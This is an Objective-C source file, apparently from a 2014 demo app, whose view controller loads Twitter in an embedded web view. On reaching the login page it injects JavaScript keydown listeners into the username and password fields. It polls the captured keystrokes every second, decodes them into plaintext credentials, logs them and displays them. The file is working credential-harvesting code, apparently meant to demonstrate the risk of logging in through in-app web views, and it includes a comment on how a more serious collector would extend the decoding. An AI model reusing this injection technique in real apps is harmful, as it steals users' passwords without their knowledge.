//
//  InsecureWebViewController.m
//  TweetFun
//
//  Created by Craig Hockenberry on 9/22/14.
//  Copyright (c) 2014 The Iconfactory. All rights reserved.
//

#import "InsecureWebViewController.h"

@interface InsecureWebViewController () <UIWebViewDelegate>

@property (nonatomic, weak) IBOutlet UIWebView *insecureWebView;
@property (nonatomic, weak) IBOutlet UILabel *insecureLabel;

@property (nonatomic, strong) NSTimer *snoopTimer;
@property (nonatomic, assign) BOOL handlerInstalled;

@property (nonatomic, strong) NSString *sekretUsernamePayload;
@property (nonatomic, strong) NSString *sekretPasswordPayload;

@property (nonatomic, strong) NSString *sekretUsername;
@property (nonatomic, strong) NSString *sekretPassword;

@end

@implementation InsecureWebViewController

- (void)viewDidLoad
{
    [super viewDidLoad];
	
	self.insecureWebView.delegate = self;
	[self.insecureWebView loadRequest:[NSURLRequest requestWithURL:[NSURL URLWithString:@"https://twitter.com"]]];
	
	self.handlerInstalled = NO;
}

- (void)didReceiveMemoryWarning
{
	// this is the least of the user's problems right now...
	
    [super didReceiveMemoryWarning];
}

#pragma mark - Actions

- (IBAction)dismiss:(id)sender
{
	NSLog(@"%s called", __PRETTY_FUNCTION__);

	[self.snoopTimer invalidate];
	self.snoopTimer = nil;

	self.insecureWebView.delegate = nil;
	
	[self.presentingViewController dismissViewControllerAnimated:YES completion:^{
		NSLog(@"%s done", __PRETTY_FUNCTION__);
	}];
}

#pragma mark - Utility

- (NSString *)decodeSekretPayload:(NSString *)payload
{
	NSMutableString *result = [NSMutableString string];
	
	NSArray *keyPresses = [payload componentsSeparatedByString:@","];
	for (NSString *keyPress in keyPresses) {
		if ([keyPress length] > 0) {
			NSArray *keyState = [keyPress componentsSeparatedByString:@":"];
			if ([keyState count] == 2) {
				NSInteger keyCode = [[keyState objectAtIndex:0] integerValue];
				BOOL shiftKey = [[keyState objectAtIndex:1] isEqualToString:@"true"];
				
				// NOTE: This is a naive implementation that decodes just enough to get the point across.
				//
				// Anyone who's more serious about collecting this information would use the full range of documented
				// values for keyCode: https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent.keyCode
				
				NSString *readableKeyCode = nil;
				if (keyCode == 0x08) {
					if ([result length] > 0) {
						[result deleteCharactersInRange:NSMakeRange([result length] - 1, 1)];
					}
				}
				else if (keyCode == 0x20) {
					readableKeyCode = @" ";
				}
				else if (keyCode >= 0x30 && keyCode <= 0x39) {
					NSInteger convertedKeyCode = keyCode;
					if (shiftKey) {
						convertedKeyCode = convertedKeyCode - 0x10;
					}
					readableKeyCode = [NSString stringWithFormat:@"%c", convertedKeyCode];
				}
				else if (keyCode >= 0x41 && keyCode <= 0x5A) {
					NSInteger convertedKeyCode = keyCode + 0x20;
					if (shiftKey) {
						convertedKeyCode = convertedKeyCode - 0x20;
					}
					readableKeyCode = [NSString stringWithFormat:@"%c", convertedKeyCode];
				}
				else {
					readableKeyCode = [NSString stringWithFormat:@"(0x%02x:%zd)", keyCode, shiftKey];
				}
				
				if (readableKeyCode) {
					[result appendString:readableKeyCode];
				}
			}
		}
	}
	
	return [result copy];
}

- (void)updateInsecureLabel
{
	self.insecureLabel.text = [NSString stringWithFormat:@"%@ / %@", self.sekretUsername, self.sekretPassword];
}

- (void)snoop
{
	if (! self.handlerInstalled) {
		[self.insecureWebView stringByEvaluatingJavaScriptFromString:@"document.getElementById('signupbutton').innerHTML = 'SUCK IT UP';"];
		
		[self.insecureWebView stringByEvaluatingJavaScriptFromString:@"var pu = document.createElement('p'); document.body.appendChild(pu); pu.style.display = 'none'; document.getElementById('username').addEventListener('keydown', function(e) {pu.innerHTML = pu.innerHTML + ',' + e.keyCode + ':' + e.shiftKey;}, false);"];
		[self.insecureWebView stringByEvaluatingJavaScriptFromString:@"var pp = document.createElement('p'); document.body.appendChild(pp); pp.style.display = 'none'; document.getElementById('password').addEventListener('keydown', function(e) {pp.innerHTML = pp.innerHTML + ',' + e.keyCode + ':' + e.shiftKey;}, false);"];

		self.handlerInstalled = YES;
	}

	NSString *sekretUsernamePayload = [self.insecureWebView stringByEvaluatingJavaScriptFromString:@"pu.innerHTML"];
	NSString *sekretPasswordPayload = [self.insecureWebView stringByEvaluatingJavaScriptFromString:@"pp.innerHTML"];

	if (! [sekretUsernamePayload isEqual:self.sekretUsernamePayload]) {
		self.sekretUsernamePayload = sekretUsernamePayload;
		self.sekretUsername = [self decodeSekretPayload:self.sekretUsernamePayload];
		NSLog(@"%s new sekretUsernamePayload = %@, sekretUsername = %@", __PRETTY_FUNCTION__, self.sekretUsernamePayload, self.sekretUsername);
		
		[self updateInsecureLabel];
	}
	
	if (! [sekretPasswordPayload isEqual:self.sekretPasswordPayload]) {
		self.sekretPasswordPayload = sekretPasswordPayload;
		self.sekretPassword = [self decodeSekretPayload:self.sekretPasswordPayload];
		NSLog(@"%s new sekretPasswordPayload = %@, sekretPassword = %@", __PRETTY_FUNCTION__, self.sekretPasswordPayload, self.sekretPassword);
		
		[self updateInsecureLabel];
	}
}

#pragma mark - UIWebViewDelegate

- (void)webViewDidStartLoad:(UIWebView *)webView
{
	NSLog(@"%s called", __PRETTY_FUNCTION__);
}

- (void)webViewDidFinishLoad:(UIWebView *)aWebView
{
	NSLog(@"%s called", __PRETTY_FUNCTION__);
}

- (void)webView:(UIWebView *)aWebView didFailLoadWithError:(NSError *)error
{
	NSLog(@"%s called", __PRETTY_FUNCTION__);
	
	NSInteger code = [error code];
	if (code != NSURLErrorCancelled && code != 102 /* Frame load interrupted */ && code != 204 /* Handled by a plugin */) {
		NSLog(@"%s error = %@", __PRETTY_FUNCTION__, error);
	}
}

- (BOOL)webView:(UIWebView *)aWebView shouldStartLoadWithRequest:(NSURLRequest *)request navigationType:(UIWebViewNavigationType)navigationType
{
	NSLog(@"%s request.URL = %@, request.mainDocumentURL = %@, navigationType = %d", __PRETTY_FUNCTION__, request.URL, request.mainDocumentURL, (unsigned)navigationType);
	
	NSURL *twitterLoginURL = [NSURL URLWithString:@"https://mobile.twitter.com/session/new"];
	NSString *twitterRetryPath = @"/login/error";
	if ([request.URL isEqual:twitterLoginURL] || [request.URL.path isEqual:twitterRetryPath]) {
		// bingo, let's start watching what happens in the web view...
		self.handlerInstalled = NO;
		self.snoopTimer = [NSTimer scheduledTimerWithTimeInterval:1.0 target:self selector:@selector(snoop) userInfo:nil repeats:YES];
	}
	
	return YES;
}

@end
